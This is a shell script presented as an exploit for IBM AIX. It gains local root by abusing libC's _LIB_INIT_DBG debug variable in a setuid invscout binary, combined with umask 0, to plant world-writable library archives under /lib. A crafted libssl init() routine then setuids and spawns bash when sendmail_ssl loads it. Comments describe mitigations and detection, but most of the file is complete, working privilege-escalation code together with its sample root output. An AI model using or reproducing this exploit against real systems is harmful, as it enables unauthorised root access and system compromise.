#!/bin/sh
# IBM AIX libC _LIB_INIT_DBG Arbitrary File Creation Exploit
# Karol Wiesek <karol-at-wiesek.pl>
#
# $ exploit.sh
# ar: Creating an archive file libssl.a.
# a - libssl.so.0
# ar: Creating an archive file libcrypto.a.
# a - libcrypto.so.0
# uid=203 euid=0
# bash-3.00# uname -a
# AIX aix53 3 5 0008A232D700
# bash-3.00# 

# Defensive notes on what follows: the weakness exercised here is a privileged
# program honouring a debug environment variable from an unprivileged caller
# (file creation under /lib), combined with a permissive umask inherited across
# the setuid boundary, and a second privileged program loading a library from
# the path that was just planted. Mitigations: apply the vendor fix for the
# libC _LIB_INIT_DBG handling and audit/remove setuid bits that are not needed
# (e.g. on the invscout client). Detection: unexpected creation of
# /lib/libssl.a or /lib/libcrypto.a, world-writable files under /lib, and
# executions of setuid binaries with _LIB_INIT_DBG* present in the environment.

# Precondition: a sendmail_ssl binary must be on PATH; it is the program run
# at the end, which is expected to load the planted libssl.a.
which sendmail_ssl 2>&1 >/dev/null
if [ $? -gt 0 ]; then
	echo "ERR: no sendmail_ssl binary"
	exit
fi

# Both target paths must not exist yet: the trigger below *creates* them, and
# an existing root-owned file with normal permissions would not be writable.
if [ -f /lib/libssl.a ]; then
	echo "ERR: /lib/libssl.a exists"
	exit
fi

if [ -f /lib/libcrypto.a ]; then
        echo "ERR: /lib/libcrypto.a exists"
        exit
fi

# Generate libssl.c, a replacement "libssl" whose init() runs when the module
# is loaded (registered as the initialization routine via -binitfini below).
# init() reports uid/euid, sets the real uid to the effective uid, removes the
# two planted archives from /lib, and execs a shell. The empty functions that
# follow export SSL_* symbol names -- presumably the set sendmail_ssl imports,
# so symbol resolution succeeds against this module instead of the real
# library (confirm against the target binary's import list).
# NOTE: the heredoc body is written verbatim to the .c file; do not add
# comments inside it.
cat << _EOF > libssl.c
#include <stdio.h>
#include <unistd.h>
void init(void)
{
        printf("uid=%i euid=%i\n", getuid(), geteuid());
        setuid(geteuid());
        unlink("/lib/libssl.a");
        unlink("/lib/libcrypto.a");
        execl("/usr/bin/bash","bash",0);
}

void SSL_CTX_ctrl(void) { }
void SSL_CTX_load_verify_locations(void) { }
void SSL_CTX_new(void) { }
void SSL_CTX_set_cert_verify_callback(void) { }
void SSL_CTX_set_client_CA_list(void) { }
void SSL_CTX_set_tmp_rsa_callback(void) { }
void SSL_CTX_set_verify(void) { }
void SSL_accept(void) { }
void SSL_clear(void) { }
void SSL_connect(void) { }
void SSL_free(void) { }
void SSL_get_error(void) { }
void SSL_get_peer_certificate(void) { }
void SSL_library_init(void) { }
void SSL_load_client_CA_file(void) { }
void SSL_load_error_strings(void) { }
void SSL_new(void) { }
void SSL_pending(void) { }
void SSL_read(void) { }
void SSL_set_accept_state(void) { }
void SSL_set_connect_state(void) { }
void SSL_set_rfd(void) { }
void SSL_set_wfd(void) { }
void SSL_shutdown(void) { }
void SSL_write(void) { }
void SSLv23_server_method(void) { }
void SSLv23_client_method(void) { }
void SSL_get_ex_data_X509_STORE_CTX_idx(void) { }
void SSL_set_verify(void) { }
void SSL_state_string_long(void) { }
void SSL_alert_type_string_long(void) { }
void SSL_alert_desc_string_long(void) { }
void SSL_get_current_cipher(void) { }
void SSL_CIPHER_get_name(void) { }
void SSL_CIPHER_get_bits(void) { }
void SSL_CIPHER_get_version(void) { }
void SSL_get_verify_result(void) { }
void SSL_CTX_use_PrivateKey_file(void) { }
void SSL_CTX_use_certificate_file(void) { }
void SSL_CTX_check_private_key(void) { }
_EOF

# Generate libcrypto.c: stub exports only, no init routine. Its purpose is
# presumably the same as above -- satisfy the libcrypto symbol references so
# the program starts -- since the planted /lib/libcrypto.a would otherwise be
# an unusable file (confirm).
cat << _EOF > libcrypto.c
void DH_size(void) { }
void ERR_error_string(void) { }
void ERR_get_error(void) { }
void RAND_seed(void) { }
void RSA_generate_key(void) { }
void X509_NAME_oneline(void) { }
void X509_STORE_CTX_get_current_cert(void) { }
void X509_STORE_CTX_get_error(void) { }
void X509_get_subject_name(void) { }
void X509_verify_cert_error_string(void) { }
void X509_STORE_CTX_get_error_depth(void) { }
void X509_STORE_CTX_get_ex_data(void) { }
void X509_verify_cert(void) { }
void RSA_free(void) { }
void ERR_get_error_line_data(void) { }
void X509_get_issuer_name(void) { }
void X509_NAME_get_text_by_NID(void) { }
void EVP_md5(void) { }
void X509_digest(void) { }
void X509_free(void) { }
void DSA_generate_parameters(void) { }
void DSA_dup_DH(void) { }
void DSA_free(void) { }
void CRYPTO_thread_id(void) { }
void DH_new(void) { }
void BN_bin2bn(void) { }
void BIO_new_fp(void) { }
void BIO_new_file(void) { }
void PEM_read_bio_DHparams(void) { }
void BIO_free(void) { }
void DH_free(void) { }
_EOF
# Build the shared objects. -binitfini:init is the AIX linker option that
# registers init() as the module's initialization routine, so it runs at load
# time. ar then wraps each shared object into a .a archive, the container
# form the AIX loader expects for shared libraries.
gcc -Xlinker -binitfini:init -shared -o libssl.so.0 libssl.c
ar -rv libssl.a libssl.so.0 

gcc -shared -o libcrypto.so.0 libcrypto.c
ar -rv libcrypto.a libcrypto.so.0

# umask 0: every file created from here on gets fully permissive mode bits.
# The umask is inherited by the child processes below, including the
# privileged one, which is what makes the root-created files writable by
# this user. A privileged program should reset its umask rather than trust
# the caller's.
umask 0

# Trigger. Per the header, libC's initialization debug hook honours the
# _LIB_INIT_DBG / _LIB_INIT_DBG_FILE environment variables and creates the
# named file. invscoutClient_VPD_Survey is presumably setuid root (the sample
# output shows euid=0), so each file is created under /lib as root -- and,
# with the umask above, world-writable. The hardening point is that a
# setuid program must not take a debug output path from its environment.
_LIB_INIT_DBG=1 _LIB_INIT_DBG_FILE=/lib/libssl.a /opt/IBMinvscout/bin/invscoutClient_VPD_Survey 2>&1 > /dev/null
_LIB_INIT_DBG=1 _LIB_INIT_DBG_FILE=/lib/libcrypto.a /opt/IBMinvscout/bin/invscoutClient_VPD_Survey 2>&1 > /dev/null

# Write the crafted archives into the planted files. `>` truncates each
# existing file in place, so the ownership and permissions set at creation
# are kept.
cat libssl.a > /lib/libssl.a
cat libcrypto.a > /lib/libcrypto.a

# Run sendmail_ssl (the backticks just expand to its resolved path). If its
# library search resolves libssl to /lib/libssl.a, the loader runs init()
# from the module above; the uid/euid line in the header is its output.
`which sendmail_ssl`

